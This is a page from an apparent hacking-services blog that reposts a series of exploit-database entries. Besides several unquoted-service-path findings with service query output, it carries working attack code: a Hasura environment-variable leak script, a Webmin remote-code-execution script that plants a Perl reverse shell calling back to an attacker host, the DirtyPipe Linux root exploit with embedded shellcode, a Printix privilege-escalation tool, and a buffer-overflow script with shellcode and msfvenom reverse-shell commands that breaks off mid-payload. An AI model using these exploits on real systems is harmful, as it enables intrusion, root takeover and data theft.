Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863123360

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.cloudflare.com/
# Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/
# Version: 1.4.107
# Tested: Windows 10 Pro x64 es

C:\Users\Hejap>sc qc CloudflareWARP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CloudflareWARP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Cloudflare WARP
        DEPENDENCIES       : wlansvc
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path
# Date: 04/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.privateinternetaccess.com
# Software Link: https://www.privateinternetaccess.com/download
# Version: 3.3.0.100
# Tested: Windows 10 x64
# Contact: https://twitter.com/dmaral3noz

# Step to discover Unquoted Service Path:

C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname

DisplayName                      Name                          PathName                                                    StartMode  StartName
Private Internet Access Service  PrivateInternetAccessService  "C:\Program Files\Private Internet Access\pia-service.exe"  Auto       LocalSystem

# Service info:

C:\Users\saudh>sc qc PrivateInternetAccessService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: PrivateInternetAccessService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Private Internet Access\pia-service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Private Internet Access Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
# Software: Hasura GraphQL Community
# Software Link: https://github.com/hasura/graphql-engine
# Version: 2.2.0
# Exploit Author: Dolev Farhi
# Date: 5/05/2022
# Tested on: Ubuntu

import requests

SERVER_ADDR = 'x.x.x.x'

url = 'http://{}/v1/metadata'.format(SERVER_ADDR)

print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')

while True:
    env_var = input('Type environment variable key to leak.\n> ')
    if not env_var:
        continue

    payload = {
    "type": "bulk",
    "source": "",
    "args": [
        {
            "type": "add_remote_schema",
            "args": {
                "name": "ttt",
                "definition": {
                    "timeout_seconds": 60,
                    "forward_client_headers": False,
                    "headers": [],
                    "url_from_env": env_var
                },
                "comment": ""
            }
        }
    ],
    "resource_version": 2
}
    r = requests.post(url, json=payload)
    try:
       print(r.json()['error'].split('not a valid URI:')[1])
    except IndexError:
        print('Could not parse out VAR, dumping error as is')
        print(r.json().get('error', 'N/A'))
HireHackking 
# Exploit Title: Malwarebytes 4.5 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.malwarebytes.com/
# Software Link: https://www.malwarebytes.com/mwb-download/
# Version: 4.5.0
# Tested: Windows 10 Pro x64 es

C:\Users\Hejap>sc qc MBAMService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MBAMService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Malwarebytes Service
        DEPENDENCIES       : RPCSS
                           : WINMGMT
        SERVICE_START_NAME : LocalSystem



#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: Foxit PDF Reader 11.0 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.foxit.com/pdf-reader/
# Software Link: https://www.foxit.com/downloads/#Foxit-Reader/
# Version: 11.0.1.49938
# Tested: Windows 10 Pro x64 es

C:\Users\Hejap>sc qc  FoxitReaderUpdateService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FoxitReaderUpdateService
        TYPE               : 110  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Foxit PDF Reader Update Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: Webmin 1.984 - Remote Code Execution (Authenticated)
# Date: 2022-03-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://github.com/webmin/webmin/archive/refs/tags/1.984.zip
# Version: <= 1.984
# Tested on: Ubuntu 18
# Reference: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell


#!/usr/bin/python3

"""
Coded by: @faisalfs10x
GitHub: https://github.com/faisalfs10x
Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
""" 

import requests
import urllib3
import argparse
import os
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TGREEN =  '\033[32m'
TRED =  '\033[31m' 
TCYAN =  '\033[36m' 
TSHELL =  '\033[32;1m' 
ENDC = '\033[m'

class Exploit(object):
    def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname):
        self.target = target
        self.username = username
        self.password = password
        self.py3http_server = py3http_server
        self.pyhttp_port = pyhttp_port
        self.upload_path = upload_path
        self.callback_ip = callback_ip
        self.callback_port = callback_port
        self.fname = fname

        #self.proxies = proxies
        self.s = requests.Session()


    def gen_payload(self):
        payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip  + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''')
        print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC)
        f = open(f"{self.fname}", "w")
        f.write(payload)
        f.close()

    def login(self):
        login_url = self.target + "/session_login.cgi"
        cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" }

        data = { 'user' : self.username, 'pass' : self.password }
        try:
            r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
            success_message = 'System hostname'
            if success_message in r.text:
                print(TGREEN + "[+] Login Successful", ENDC)
            else:
                print(TRED +"[-] Login Failed", ENDC)
                exit()

        except requests.Timeout as e:
            print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC)
            exit()

    def pyhttp_server(self):
        print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n')
        os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up
        print('[+] Sleep 3 second to ensure http server is up!')
        time.sleep(3) # Sleep for 3 seconds to ensure http server is up!

    def download_remote_url(self):
        download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin"
        headers = { 
                    "Accept": "application/json, text/javascript, */*; q=0.01", 
                    "Accept-Encoding": "gzip, deflate", 
                    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", 
                    "X-Requested-With": "XMLHttpRequest", 
                    "Referer": self.target + "/filemin/?xnavigation=1" 
        }

        data = { 
                'link': "http://" + self.py3http_server + "/" + self.fname, 
                'username': '', 
                'password': '', 
                'path': self.upload_path 
        }

        r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True)
        print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}")

    def modify_permission(self):
        modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30"
        headers = { "Referer": self.target + "/filemin/?xnavigation=1" }
        data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path }
       
        r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True)
        print(f"[+] Modifying permission of {self.fname} to 0755")

    def exec_revshell(self):
        url = self.target + '/' + self.fname
        try:
            r = self.s.get(url, verify=False, allow_redirects=True, timeout=3)
        except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned!
            print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC)
            print("[+] Shell location: " + url)
        else:
            print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC)

    def do_cleanup(self):
        print(TCYAN + '\n[+] Cleaning up ')
        print(f'[+] Killing: http.server on port {self.pyhttp_port}')
        os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})')
        exit()

    def run(self):
        self.gen_payload()
        self.login()
        self.pyhttp_server()
        self.download_remote_url()
        self.modify_permission()
        self.exec_revshell()
        self.do_cleanup()


if __name__ == "__main__":

    parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell')
    parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000')
    parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123')
    parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080')
    parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell')
    parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell')
    parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0')
    args = parser.parse_args()

    target = args.target
    username = args.credential.split(':')[0]
    password = args.credential.split(':')[1]
    py3http_server = args.py3http_server
    pyhttp_port = py3http_server.split(':')[1]
    callback_ip = args.callback_ip
    callback_port = args.callback_port
    upload_path = "/usr/share/webmin" # the default installation of Webmin Debian Package, may be in different location if installed using other method.
    fname = "revshell.cgi" # CGI script name, you may change to different name

    pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname)
    pwn.run()
HireHackking 
// Exploit Title: Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)
// Exploit Author: blasty (peter@haxx.in)
// Original Author: Max Kellermann (max.kellermann@ionos.com)
// CVE: CVE-2022-0847

/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <max.kellermann@ionos.com>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <stdint.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

// small (linux x86_64) ELF file matroshka doll that does;
//   fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
//   write(fd, elfcode, elfcode_len)
//   chmod("/tmp/sh", 04755)
//   close(fd);
//   exit(0);
//
// the dropped ELF simply does:
//   setuid(0);
//   setgid(0);
//   execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
unsigned char elfcode[] = {
	/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
	0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
	0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
	0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
	0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
	0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
	0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
	0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
	0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
	0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
	0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
	0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
	0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
	0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
	0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
	0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
	0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
	0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
	0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
};

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */
}

int hax(char *filename, long offset, uint8_t *data, size_t len) {
	/* open the input file and validate the specified offset */
	const int fd = open(filename, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return -1;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return -1;
	}

	/* create the pipe with all flags initialized with
	   PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	   pipe; this will add a reference to the page cache, but
	   since copy_page_to_iter_pipe() does not initialize the
	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return -1;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return -1;
	}

	/* the following write will not create a new pipe_buffer, but
	   will instead write into the page cache, because of the
	   PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, len);
	if (nbytes < 0) {
		perror("write failed");
		return -1;
	}
	if ((size_t)nbytes < len) {
		fprintf(stderr, "short write\n");
		return -1;
	}

	close(fd);

	return 0;
}

int main(int argc, char **argv) {
	if (argc != 2) {
		fprintf(stderr, "Usage: %s SUID\n", argv[0]);
		return EXIT_FAILURE;
	}

	char *path = argv[1];
	uint8_t *data = elfcode;

	int fd = open(path, O_RDONLY);
	uint8_t *orig_bytes = malloc(sizeof(elfcode));
	lseek(fd, 1, SEEK_SET);
	read(fd, orig_bytes, sizeof(elfcode));
	close(fd);

	printf("[+] hijacking suid binary..\n");
	if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) {
		printf("[~] failed\n");
		return EXIT_FAILURE;
	}

	printf("[+] dropping suid shell..\n");
	system(path);

	printf("[+] restoring suid binary..\n");
	if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) {
		printf("[~] failed\n");
		return EXIT_FAILURE;
	}

	printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n");
	system("/tmp/sh");

	return EXIT_SUCCESS;
}
HireHackking 
# Exploit Title: Cobian Backup 0.9 - Unquoted Service Path
# Date: 06/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.cobiansoft.com//
# Software Link: https://www.cobiansoft.com/download.php/
# Version:0.9.93
# Tested: Windows 10 Pro x64 es

C:\Users\Hejap>sc qc CobianReflectorService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CobianReflectorService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Cobian Reflector\Cobian.Reflector.Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Cobian Reflector Engine
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation
# Date: 3/2/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link:
https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25090
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090

using System;
using System.Runtime.InteropServices;
using System.Drawing;

using System.Reflection;
using System.Threading;
using System.IO;
using System.Text;
using System.Resources;
using System.Diagnostics;

//Assembly COM for transparent creation of the application.

//End of Assembly COM For Transparent Creation usage.
public class Program
{
	//Initiator class for the program, the program starts on the main method.
	public static void Main(string[] args)
	{
		//Console.SetWindowSize(120,30);
		//Console.SetBufferSize(120,30);
		Console.ForegroundColor = ConsoleColor.Blue;
		Console.WriteLine("┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
		Console.WriteLine("├			  oo dP                           dP                                ");
		Console.ForegroundColor = ConsoleColor.Red;
		Console.WriteLine("├			     88                           88                                ");
		Console.ForegroundColor = ConsoleColor.Green;
		Console.WriteLine("├			  dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. ");
		Console.ForegroundColor = ConsoleColor.Blue;
		Console.WriteLine("├			  88 88'  `88 88'  `88    .d8P'   88   88ooood8 88'`88'`88 88'  `88 ");
		Console.ForegroundColor = ConsoleColor.Yellow;
		Console.WriteLine("├			  88 88    88 88.  .88  .Y8P      88   88.  ... 88  88  88 88.  .88 ");
		Console.ForegroundColor = ConsoleColor.Magenta;
		Console.WriteLine("├			  dP dP    dP `88888P8 d888888P   dP   `88888P' dP  dP  dP 88Y888P' ");
		Console.WriteLine("├			                                                           88       ");
		Console.WriteLine("├			                                                           dP       ");
		Console.ForegroundColor = ConsoleColor.Blue;
		Console.Write("├			                        For ");
		Console.ForegroundColor = ConsoleColor.Magenta;
		Console.Write("Printix ");
		Console.ForegroundColor = ConsoleColor.Blue;
		Console.Write("Services                       Designed By Logan Latvala\n");
		Console.WriteLine("└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
		Thread.Sleep(3000);
		string filesH = "";
		Console.WriteLine("Drag and drop a payload onto this application for execution.");
		try
		{
			if (args[0]?.Length >0)
			{
				Console.WriteLine("File Added: " + args[0]);
			}
			
		}
		catch (Exception e)
		{
			Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n");
			Console.ForegroundColor = ConsoleColor.Red;
			Console.WriteLine(e);
			Console.ReadLine();
			Environment.Exit(40);
		}


		Console.WriteLine("\n We're going to look for your printix installer, one moment...");
		string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories);

		double mCheck = 1.00;

		string trueInstaller = "";
		//Starts to enumerate window's installer directory for an author with the name of printix.
		foreach (string path in installerSearch)
		{
			Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length);
			Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done.");
			if (readFileProperties(path, "Printix"))
			{
				trueInstaller = path;
				Console.WriteLine("We've found your installer, we'll finish enumeration.");
				goto MGMA;
			}
			mCheck++;
		}
	//Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely.
	MGMA:
		if (trueInstaller == "")
		{
			Console.WriteLine("We can't find your installer, you are not vulnerable.");
			Thread.Sleep(2000);
			Environment.Exit(12);
		}
		Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
		Console.WriteLine("├ We are starting to enumerate your temporary directory.");
		Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");

		//Start a new thread here for enumeration.

		Thread t = new Thread(() => newTempThread(filesH, args));
		t.Start();



		Process.Start(trueInstaller);



		Console.WriteLine("All done.");
		Console.ReadLine();
	}
	public static void newTempThread(string filesH, string[] args)
	{
		while (true)
		{
			try
			{
				//Starts the inheriting process for printix, in which scans for the files and relays their contents.
				string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories);
				if (!string.IsNullOrEmpty(files[0]))
				{
					foreach (string fl in files)
					{
						if (!filesH.Contains(fl))
						{

							//filesH += " " + fl;
							string[] fileText = File.ReadAllLines(fl);
							int linerc = 0;
							foreach (string liners in fileText)
							{

								if (liners.Contains("SetupFileName"))
								{

									//Most likely the temporary directory for setup, which presents it properly.
									Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
									Console.WriteLine("├ " + fl);
									fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\"";
									Console.WriteLine("├ " + fileText[linerc] + "");
									Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
									Console.WriteLine("│");
									filesH += " " + fl;

									File.WriteAllText(fl, string.Empty);
									File.WriteAllLines(fl, fileText);
								}
								linerc++;
							}
						}
					}
				}
			}
			catch (Exception e) { Console.WriteLine("There was an error, try re-running the program. \n" + e); Console.ReadLine(); }

			Thread.Sleep(20);
		}
	}
	public static bool readFileProperties(string file, string filter)
	{
		System.Diagnostics.Process process = new System.Diagnostics.Process();
		System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
		startInfo.UseShellExecute = false;
		startInfo.RedirectStandardOutput = true;
		startInfo.FileName = "CMD.exe";
		startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\"";
		process.StartInfo = startInfo;
		process.Start();
		string output = process.StandardOutput.ReadToEnd();
		process.WaitForExit();
		if (output.Contains(filter)) { return true; }
		else { return false; }
		//wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version
	}
}
HireHackking 
# Exploit Title: Audio Conversion Wizard v2.01 - Buffer Overflow 
# Exploit Author: Hejap Zairy
# Date: 03.07.2022
# Software Link:   https://www.litexmedia.com/acwizard.exe
# Tested Version: v2.01
# Tested on: Windows 10 64bit

# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Audio Conversion Wizard and press Enter Code
# 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'
# 5.- Click 'OK'

# Author  Code By Hejap Zairy
#!/usr/bin/env python

from pwn import *

buffer = "\x41" * 1016 
push_esp  =  p32(0x1004dbff) #push esp ret ret from  id3lib.dll
nops =  "\x90" * 15#515 tshhh theardlooo love Malware 
#msfvenom   --arch x64  windows/x64/shell_reverse_tcp  lhost=ip lport=443      -f python -e x64/shikata_ga_nai  -b "\x00\x0a\x0d\x20"  
#msfvenom  --arch x64  -p windows/x64/messagebox   TEXT="0day Hejap Zairy"  -f python -e x64/shikata_ga_nai  EXITFUNC=thread -b "\x00\x0a\x0d\x20"
buf =  b""
buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00"
buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e"
buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9"
buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52"
buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00"
buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b"
buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48"
buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6"
